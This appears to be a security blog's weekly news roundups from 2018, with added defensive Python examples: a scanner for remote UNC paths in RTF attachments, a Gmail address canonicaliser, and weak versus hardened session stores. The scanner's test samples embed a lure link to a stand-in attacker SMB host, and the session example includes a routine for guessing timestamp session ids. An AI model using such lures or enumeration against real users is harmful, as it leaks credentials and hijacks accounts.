Security Roundup - 2018-04-19

RSA attendee list exposed. Attended RSA? A subset of your attendee data turned out to be recoverable: reverse engineering the conference's mobile app revealed a publicly accessible API endpoint from which its SQLite database could be fetched and decrypted. This is apparently similar to a flaw in their 2014 mobile app.

Android patch gap. The Android ecosystem already suffers from lags in security patches, due to a fragmented OS and manufacturer ecosystem. Now security researchers have found that even when manufacturers ship a monthly patch level, the build may not include all of the fixes that level claims. In some cases this appears to be deliberate, with at least one vendor advancing the reported patch level without actually updating the code, which misleads users who check it.

A day in the life of a CISO. While no two days are ever quite the same, Cory Scott, CISO of LinkedIn, attempts to describe what an average day as a CISO looks like for him.

Abusing Google Tag Manager for fun and profit. Google Tag Manager lets site admins create custom scripts (tags) that a single container snippet on the site loads at runtime. Sucuri goes over how an attacker with write access to your site could subtly load malicious scripts: copy your container, add their own tags to it, and then swap the reference on your pages so the injected code looks like your own tag manager. This assumes they are already able to modify content on your site, but with the number of CMSes with exploits…

Microsoft Outlook bug exposes account information. A large bug has been found in Microsoft Outlook's preview pane: when an RTF message embeds an OLE object hosted on a remote SMB share, the preview helpfully reaches out to that server, leaking user information such as IP address, Windows domain, username, machine name, and an NTLM authentication hash, which an attacker could crack offline to recover the user's password. The user does not need to open the message, only preview it.
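
As an added detection example (not from the page or the vendor), the scanner below looks for the ingredient that makes this bug exploitable: a UNC path (`\\host\share\...`) hidden inside the hex-encoded `\*\objdata` group of an RTF file. The samples are constructed, the OLE header bytes are placeholders, and `attacker.example` is a made-up host; the 8-bit and UTF-16LE scan is an assumption about how link monikers encode the path, so treat a miss as inconclusive, not clean.

```python
import re

# \*\objdata groups carry the hex-encoded OLE object (or OLE link) payload.
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")
# \\host\share\path, stopping at whitespace, NUL, or quotes.
UNC_RE = re.compile(r"\\\\[A-Za-z0-9.\-]+\\[^\s\x00\"']+")


def _objdata_blobs(rtf: bytes):
    """Yield the decoded binary payload of every \\*\\objdata group."""
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:          # tolerate a truncated final nibble
            hexdata = hexdata[:-1]
        try:
            yield bytes.fromhex(hexdata.decode("ascii"))
        except ValueError:
            continue


def find_remote_unc_paths(rtf: bytes) -> list:
    """Return UNC paths found inside embedded OLE object data.

    Assumption: link monikers may store the path as 8-bit text or as UTF-16LE,
    so both decodings are scanned. A hit means previewing the message can
    trigger an outbound SMB connection (and NTLM authentication) to that host.
    """
    found = []
    for blob in _objdata_blobs(rtf):
        for text in (blob.decode("latin-1"), blob.decode("utf-16-le", errors="ignore")):
            for m in UNC_RE.finditer(text):
                if m.group(0) not in found:
                    found.append(m.group(0))
    return found


# --- Constructed samples (not real captures). Header bytes are placeholders. ---
def _objdata_group(payload: bytes) -> bytes:
    return b"{\\*\\objdata " + payload.hex().encode("ascii") + b"}"


LURE_UNC = "\\\\attacker.example\\share\\lure.rtf"   # hypothetical attacker host

SAMPLE_RTF_ASCII = (
    b"{\\rtf1\\ansi\\deff0 Invoice attached\\par\n"
    b"{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
    + _objdata_group(b"\x01\x05\x00\x00\x02\x00\x00\x00" + LURE_UNC.encode("ascii") + b"\x00")
    + b"}}"
)
SAMPLE_RTF_UTF16 = (
    b"{\\rtf1\\ansi\\deff0 Invoice attached\\par\n"
    b"{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
    + _objdata_group(b"\x01\x05\x00\x00\x02\x00\x00\x00" + LURE_UNC.encode("utf-16-le") + b"\x00\x00")
    + b"}}"
)
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0 Nothing embedded here\\par}"

if __name__ == "__main__":
    for name, doc in [("ascii", SAMPLE_RTF_ASCII), ("utf16", SAMPLE_RTF_UTF16), ("benign", BENIGN_RTF)]:
        print(name, find_remote_unc_paths(doc))
```

Run it against a mail gateway's RTF attachments or exported .msg bodies; anything that resolves to a non-corporate host deserves a look. The network-side companion to this check is the one the advisory already recommends: block outbound SMB (TCP 445 and the NetBIOS ports) at the perimeter, so a leaked NTLM exchange never leaves the building even if the scanner misses a sample.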

The early internet lacked security because… Believe that the early internet did not have security built in because of 'open networks' and 'inherent trust'? You may want to fact-check that against the US export regulations on cryptography. Engineers were essentially torn between adoption and interoperability on one side and having all their systems restricted by export control on the other. Can you imagine a world in which the US had its own network, European nations another, and so on? And you think getting on wi-fi at an airport is bad NOW…

Botnets kept on their toes. Two prominent botnets have had their work cut out for them, as researchers have focused on identifying and defanging them. The first is Smoke Loader, for which Microsoft has spent considerable time building countermeasures while the malware authors keep developing new workarounds. The second is EITest, a major botnet used to redirect users to malware and tech support scams, which has had its key C&C infrastructure taken over, effectively dismantling the entire operation.

A study of login abuse. Akamai recently unveiled research into fraudulent activity against API-based login endpoints, the kind of authentication that is largely service-to-service rather than a user typing into a form. Their research indicates that roughly 30% of all API login requests they observed were fraudulent, which is what credential stuffing against an unmonitored endpoint looks like.

More abuse of Facebook data. Security researchers found that malicious third-party scripts could abuse the Login with Facebook functionality to harvest user data, including name, email address and profile photo. In one case, the data was accidentally made available to any JavaScript running on the site.

2018 Tax Fraud Shenanigans. Brian Krebs points out some new 'fun' in tax fraud. His article contains not only the story of a CPA whose account was compromised for weeks (and thus a fair number of his clients having their returns stolen), but also an extension of IT support fraud into tax refund fraud.

Security Roundup - 2018-04-12

The 'convenience' of a Bluetooth credit card. Who would have imagined that wirelessly enabling credit cards would be a problem? Several 'consolidated' credit cards have hit the market in the last few years and now researchers have broken into them. In particular, the FUZE card can be compromised with only seconds of physical access (like when you hand it over to pay), after which the stored card details can be downloaded over Bluetooth for as long as the card remains in range.

Phishing attacks can leverage email handling discrepancies. Did you know that Gmail ignores the . character in the local part of an address? A software engineer discovered this the other day when they received an unexpected email from Netflix saying a credit card had been declined. Only it wasn't their credit card, but someone else's account registered with a dotted variant of their email address. Was this an honest mistake? Or potentially a new scam to get accounts paid off by unsuspecting people?
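
The defensive side of this is a canonicalization step at signup and billing time, so a service notices that two "different" addresses deliver to one mailbox. The example below is added here and is not from the page or from any provider; it encodes the Gmail behaviour the item describes (dots ignored, `+tag` suffixes dropped, case-insensitive, `googlemail.com` aliased to `gmail.com`) and deliberately does not assume those rules for other domains. The sample signups are constructed.

```python
from collections import defaultdict

# Domains Google delivers to the same mailbox namespace (known Gmail behaviour).
GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def canonical_email(address: str) -> str:
    """Return the address a provider actually delivers to.

    Gmail: local part is case-insensitive, dots are ignored, and everything
    from '+' onward is a sub-address tag.  For every other domain only the
    case is folded (assumption), because dot and tag handling is
    provider-specific and must not be guessed.
    """
    address = address.strip()
    local, sep, domain = address.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an email address: {address!r}")
    domain = domain.lower()
    if domain in GMAIL_DOMAINS:
        local = local.lower().split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    else:
        local = local.lower()
    return f"{local}@{domain}"


def find_colliding_accounts(addresses):
    """Group registered addresses that all land in the same mailbox."""
    groups = defaultdict(list)
    for addr in addresses:
        groups[canonical_email(addr)].append(addr)
    return {canon: members for canon, members in groups.items() if len(members) > 1}


# Constructed signup list: three of these are one Gmail mailbox.
SAMPLE_SIGNUPS = [
    "jane.doe@gmail.com",
    "JaneDoe+netflix@googlemail.com",
    "j.a.n.e.d.o.e@gmail.com",
    "jane.doe@example.com",
]

if __name__ == "__main__":
    for canon, members in find_colliding_accounts(SAMPLE_SIGNUPS).items():
        print(canon, "<-", members)
```

Flagging collisions is the easy part; the right response is to require a fresh verification click before the new address can be billed, since the mailbox owner is the only party who can prove they meant to sign up.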

Harmless social quiz, or tactical information harvesting? Have you ever thought about how much information you are potentially giving away with those small quizzes on social sites? Have you ever looked at the questions and noticed that some of them are suspiciously close to your password recovery questions?

2017 Hacked Website Report. Sucuri has released their annual hacked website report. There are some interesting items including:

  • WordPress is the most prevalent CMS, and the one most likely to be up to date. BUT since it is so common it also ends up being the platform with the most infections over the same period.
  • Only 17% of websites Sucuri identified as compromised ended up on blacklists in the same interval.
  • The number of infected files needing cleaning almost doubled year over year, demonstrating an increase in the depth of compromise.

How (not) to do session management. What happens when you design session management so that session identifiers are timestamps and never seem to expire? This blog post, for one, where a researcher noticed he could effectively gain access to any client's files at a specific cloud data storage company: a timestamp is guessable, and a token that never expires stays guessable forever.
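
To make the failure concrete, here is an added example (not code from the post or the company involved) with the weak design beside a hardened one. The weak store mirrors what the item describes: the session id is the login timestamp and nothing ever expires, so an attacker who knows roughly when a victim logged in can simply walk the id space. The hardened store uses random ids, keeps only a hash of each id at rest, and enforces both an absolute and an idle lifetime. Timestamps and usernames are constructed.

```python
import hashlib
import secrets


# --- Weak design: the session id is the login timestamp and never expires. ---
class TimestampSessions:
    def __init__(self):
        self._by_id = {}

    def create(self, user: str, now: float) -> str:
        sid = str(int(now))          # predictable: anyone can enumerate these
        self._by_id[sid] = user
        return sid

    def lookup(self, sid: str):
        return self._by_id.get(sid)  # no expiry, ever


def guess_timestamp_session(sessions: TimestampSessions, approx_login_time: float, window: int = 300):
    """Attacker who only knows roughly when a victim logged in tries nearby ids."""
    base = int(approx_login_time)
    for candidate in range(base - window, base + window + 1):
        user = sessions.lookup(str(candidate))
        if user is not None:
            return str(candidate), user
    return None


# --- Hardened design: random ids, hashed at rest, absolute plus idle expiry. ---
class SecureSessions:
    def __init__(self, absolute_ttl: float = 8 * 3600, idle_ttl: float = 30 * 60):
        self.absolute_ttl = absolute_ttl
        self.idle_ttl = idle_ttl
        self._by_hash = {}  # sha256(sid) -> [user, created_at, last_seen]

    @staticmethod
    def _key(sid: str) -> str:
        # Store only a hash so a leaked session table cannot be replayed directly.
        return hashlib.sha256(sid.encode()).hexdigest()

    def create(self, user: str, now: float) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._by_hash[self._key(sid)] = [user, now, now]
        return sid

    def lookup(self, sid: str, now: float):
        key = self._key(sid)
        entry = self._by_hash.get(key)
        if entry is None:
            return None
        user, created_at, last_seen = entry
        if now - created_at > self.absolute_ttl or now - last_seen > self.idle_ttl:
            del self._by_hash[key]   # expired: revoke rather than silently extend
            return None
        entry[2] = now               # idle timer restarts on legitimate use
        return user

    def revoke(self, sid: str) -> None:
        self._by_hash.pop(self._key(sid), None)


if __name__ == "__main__":
    weak = TimestampSessions()
    victim_sid = weak.create("victim", now=1_523_000_000)
    print("guessed:", guess_timestamp_session(weak, approx_login_time=1_523_000_100))

    strong = SecureSessions()
    sid = strong.create("victim", now=1_523_000_000)
    print("random id:", sid, "->", strong.lookup(sid, now=1_523_000_060))
```

The two lifetimes do different jobs: the idle limit bounds how long an unattended browser stays logged in, the absolute limit bounds how long a stolen token is useful even if the thief keeps it warm.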

Malware code signing abuse deep dive. We've talked about malware code signing recently, but Trend Micro takes a further deep dive into the topic. Interestingly, in their dataset they see more signed malware than signed legitimate applications.

On the lifecycle of exploit development. There is obviously much interest in how long it takes for a vulnerability to go from known to exploited in the wild. One security researcher was surprised to discover that some SQL injection vulnerabilities he had documented had not been used, and decided to find out why. This seems to be in part because malicious actors monitor a handful of specific sites for new disclosures; if a vulnerability is not published on those sites, it may simply be ignored.

Security Roundup - 2018-04-05

Panera Bread data leak. The big news this week was Panera's handling of a security disclosure: they left a flaw that exposed customer information unaddressed for eight months. Panera was driven to take action only after the security researcher reached out to Brian Krebs, who published a scathing article with the details. You can read the researcher's own account here.

Honeypot, meet HoneyBot. In an ever more connected world, there is growing concern about the security of connected devices, including robots. Now one set of researchers has started experimenting with HoneyBots, taking the honeypot concept, where researchers observe malicious users on a decoy system, and applying it to robots.

Chat widgets leak PII. Security researchers discovered that a number of live chat systems, used by companies including Google, Verizon and Disney, were leaking real employee names and other identifying details. This could lead to tailored social engineering attacks, or even directed harassment of employees.

Obfuscation through legitimate appearances. Analysts at Sucuri had fun analyzing what at first glance looks like an innocent file with proper code structure, but turned out to be obfuscated WordPress malware.

Privacy in DNS. While the push for TLS everywhere continues, others have turned to the remaining gaps in internet privacy. Even when the contents of a TLS session are unreadable, someone still knows who you are talking to, because the DNS lookup that precedes the connection is in the clear. Numerous researchers are now looking at this problem: OpenDNS has run DNSCrypt for several years, Cloudflare is pushing DNS over TLS and just launched a new public resolver, and academic researchers at Princeton are working on Oblivious DNS.

Security Roundup - 2018-03-29

Processor based attacks continue to be researched. It should surprise no one that security researchers have begun a close inspection of the hardware platforms our software runs on. The latest, called BranchScope, appears to be a complement to Spectre. Where Spectre abuses speculative execution driven by poisoned branch predictions, BranchScope targets the directional branch predictor itself, priming it and then observing its state to leak information. Meanwhile, Microsoft released a bad patch for Meltdown on Windows 7 machines which allowed any program to read and write arbitrary memory (including what would otherwise be protected kernel memory).

Your library account has expired. That is the opening of a highly effective phishing lure that a group of attackers used for years, resulting in intrusions at at least 300 universities. The lure was so successful that, according to researchers who studied these campaigns, the text rarely changed over the course of four years.

DNS over HTTPS promises security, brings privacy concerns. DNS is one of the primary protocols of the internet. It was, however, not built with security or privacy in mind, meaning that anyone able to monitor your traffic can see which servers you are trying to contact. DNS over HTTPS (DoH) is a proposed solution under discussion at the IETF. In the wake of Facebook's privacy leaks, privacy advocates worry that adding one layer of privacy protection will concentrate resolution at a few large providers, creating more centralized points of spying.

Invasive introspection of microcontroller firmware. How far would you go to reverse engineer the program on a hardware chip? Researchers at Duo Security show you just how far down the rabbit hole they went.

GoScanSSH targets multiple devices. A new malware strain that has been active since at least June 2017 has been discovered by Cisco Talos. What is interesting about this malware is its use of Go to target multiple hardware architectures. It uses an extensive list of over 7,000 username and password combinations to brute-force SSH logins, as well as a blacklist of IP blocks it avoids so as to escape the scrutiny of government and military networks.

Security Roundup - 2018-03-22

Pwn2Own 2018 Results. This year's Pwn2Own competition, where browser and virtual machine vendors challenge hackers to break their protections, has concluded, and like previous years a number of exploits were demonstrated against major browsers, resulting in a grand total of $267K in bounties being paid out across the two days.

BitTorrent software victim of supply chain attack. The latest reported supply chain attack occurred against the BitTorrent client MediaGet, with the trojanized updater attempting to infect 400K machines in just 12 hours. The attack was largely unsuccessful, as Windows Defender detected the cryptominer payload and blocked the install.

Burying your head in the sand. In what appears to be a case of willful ignorance, check out this story about a company who appears to be ignoring news about their data being exposed. Allegedly, the company in question is making it as hard as possible for someone to disclose, even going as far as to block them on Twitter.

Chrome extension designed to thwart CPU side-channel attacks. Researchers who have contributed to CPU side-channel work (including Rowhammer, Meltdown, and Spectre) have used their findings to identify several primitives these attacks depend on (high-resolution timers, shared memory, and similar) and then built a defense against them. Released as the browser extension 'Chrome Zero', it intercepts JavaScript and rewrites it before it is interpreted, attempting to neutralize any side channels that could be exploited.

More IoT vulnerabilities. A number of high-severity CVEs have been issued for a range of IP-enabled security cameras. The flaws have such far-reaching consequences that the manufacturer has opted to release an update to fix them, despite some of the products already being end of life.

Breaking into encrypted external hard drives. I found this article on one user's hobby of breaking into encrypted hard drives fascinating. These are the external drives with hardware encryption and a keypad to unlock the device, and the interested party here figured out how to pull the PIN out of the hardware.

Cryptocurrency hardware wallet defeated by teenager. In a similar story, a cryptocurrency hardware wallet was reported to have security flaws that could allow attackers to install custom firmware on it, and this was discovered by a 15 year old. The flaw stems from the device having both a secure processor and an insecure processor; since the two can (and have to!) communicate, the insecure side becomes a path for attackers to siphon off keys.

Bug Bounty Bonanza. Lots of prominent bug bounty news lately, starting with Microsoft announcing a new bounty for speculative execution CPU flaws like Spectre and Meltdown, paying up to $250K. Second, Box has announced updates to their Vulnerability Disclosure Program (VDP), simplifying their guidelines to bring clarity to the process and better protect white hats from potential legal threats. Finally, Netflix has announced their own public bug bounty program, after running a VDP for a number of years.
